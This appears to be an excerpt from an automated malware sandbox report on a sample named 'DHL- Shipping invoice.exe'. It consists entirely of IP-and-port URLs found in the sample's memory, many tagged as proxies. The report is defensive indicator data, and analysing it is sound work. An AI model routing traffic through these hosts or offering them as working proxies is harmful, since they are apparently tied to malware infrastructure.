                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:1487
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:1487://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:18131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:18131://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:18145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:18145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:19285
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:19285://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:19285P
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3273
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3273://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9921
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9921://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:11535
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:11535://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:1487
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:1487://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:19965
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:19965://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13045
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13045://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10891
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10891://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10891p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11023
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:11023://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:15493
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:15493://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:19835
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:19835://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:19965
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:19965://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:24547
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:24547://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26359
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26359://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26843
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26843://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6353
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6353://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:9351://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:3787://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:23927
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:23927://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.189:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.104.254:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.104.254:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.59.198://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.247.130:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.249.153:48606
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.249.153:48606://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.33:8181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.33:8181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.63.73.234:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.63.73.234:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.113.250.186:16099
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.113.250.186:16099://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.185.95.177:39593
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.185.95.177:39593://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:4163
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:4163://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5965
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5965://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:6551
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:6551://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:15991://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:19243
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:19243://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:19243temi
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:2737://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:7667
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:7667://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:7667p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.9
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:10367
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:10367://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:13083
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:13083://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:22379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25025
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25025://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25521
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:25521://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29287
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29287://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29507
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29507://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30233
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30233://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7481
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:7481://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.91:18031
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.91:18031://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:25873
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:25873://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:14699
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:14699://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:14699p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:16147
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:16147://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815EB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:20033
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:20033://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98151E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2099
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:21245://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2251
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2251://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:24593
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:24593://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:28709
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:28709://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:29129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981484000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30589
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30589://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5651
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5651://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:9277
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:9277://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.85:87
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.184:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.184:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981631000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.123:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.123:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.217.158.202:4145
